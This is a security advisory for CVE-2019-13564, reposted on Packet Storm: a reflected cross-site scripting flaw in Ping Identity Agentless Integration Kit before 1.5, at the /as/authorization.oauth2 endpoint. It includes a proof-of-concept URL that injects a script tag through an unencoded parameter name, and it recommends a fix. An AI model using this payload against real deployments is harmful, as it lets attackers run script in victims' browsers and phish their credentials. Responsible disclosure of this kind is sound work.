what you don't know can hurt you

Ping Identity Agentless Integration Kit Cross Site Scripting

Ping Identity Agentless Integration Kit Cross Site Scripting
Posted Aug 30, 2019
Authored by Thomas Konrad | Site sba-research.org

Ping Identity Agentless Integration Kit versions prior to 1.5 suffer from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2019-13564
MD5 | 90202023fa36c339da0206d4fe19c467

Ping Identity Agentless Integration Kit Cross Site Scripting

Change Mirror Download
# Ping Identity Agentless Integration Kit Reflected Cross-site Scripting (XSS) #

Link: https://github.com/sbaresearch/advisories/tree/public/2019/SBA-ADV-20190305-01_Ping_Identity_Agentless_Integration_Kit_Reflected_XSS

## Vulnerability Overview ##

Ping Identity Agentless Integration Kit before 1.5 is susceptible to
Reflected Cross-site Scripting at the `/as/authorization.oauth2`
endpoint due to improper encoding of an arbitrarily submitted HTTP
GET parameter name.

* **Identifier** : SBA-ADV-20190305-01
* **Type of Vulnerability** : Cross-site Scripting
* **Software/Product Name** : [Ping Identity Agentless Integration Kit](https://www.pingidentity.com/developer/en/resources/agentless-integration-kit-developers-guide.html)
* **Vendor** : [Ping Identity](https://www.pingidentity.com/)
* **Affected Versions** : < 1.5
* **Fixed in Version** : 1.5
* **CVE ID** : CVE-2019-13564
* **CVSSv3 Vector** : AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
* **CVSSv3 Base Score** : 6.1 (Medium)

## Vendor Description ##

> After authenticating the user (via a federated security token or
> authentication adapter), the user will be presented to the protected
> application via an SP adapter. This adapter provides the last-mile
> connection between the federation server (PingFederate) and the
> application, the user will be presented to the application which can
> then create a session and render the application for the
> authenticated user.

Source: <https://www.pingidentity.com/developer/en/resources/agentless-integration-kit-developers-guide/last-mile-integration.html>

## Impact ##

By exploiting the documented vulnerability, an attacker can execute
JavaScript code in a victim's browser within the origin of the target
site. This can be misused, for example, for phishing attacks by
displaying a fake login form in the context of the trusted site via
JavaScript and then sending the victim's credentials to the attacker.

## Vulnerability Description ##

The `/as/authorization.oauth2` endpoint of PingFederate takes several
HTTP GET parameter name-value pairs, which are subsequently rendered
as an HTML form with hidden input fields.

```text
https://idp.example.com/as/authorization.oauth2?response_type=code&client_id=CLIENT&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcb
```

The name of the HTTP parameter is rendered as the `name` attribute of
the corresponding input field, and the HTTP parameter value is rendered
as the `value` attribute. The content of the `value` attribute is HTML-
encoded and therefore not susceptible to XSS. However, the content of
the `name` attribute is written to the HTML document without any
encoding or sanitization.

## Proof of Concept ##

An attacker can exploit this vulnerability by ending the HTML attribute
and element and then inserting, for example, a `script` tag.

```text
https://idp.example.com/as/authorization.oauth2?response_type=code&client_id=CLIENT&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcb&%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E
```

The last parameter reads as follows when URL-decoded:

```html
"><script>alert(1)</script>
```

This leads to the following HTML response (shortened for readability):

```html
<form method="post" action="[...]">
<input type="hidden" name="REF" value="[...]"/>
<!-- ... -->
<input type="hidden" name=""><script>alert(1)</script>" value=""/>
<!-- ... -->
</form>
```

## Recommended Countermeasures ##

We recommend to HTML-encode the parameter name the same way the
parameter value is encoded.

## Timeline ##

* `2019-03-05` Identified the vulnerability in version < 1.5
* `2019-03-25` Contacted the vendor via support
* `2019-05-24` Finding review with Ping Identity and SBA Research
* `2019-07-11` Publication of CVE-2019-13564

## References ##

* [NIST NVD entry of CVE-2019-13564](https://nvd.nist.gov/vuln/detail/CVE-2019-13564)

## Credits ##

* Thomas Konrad ([SBA Research](https://www.sba-research.org/))

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    14 Files
  • 20
    Sep 20th
    20 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close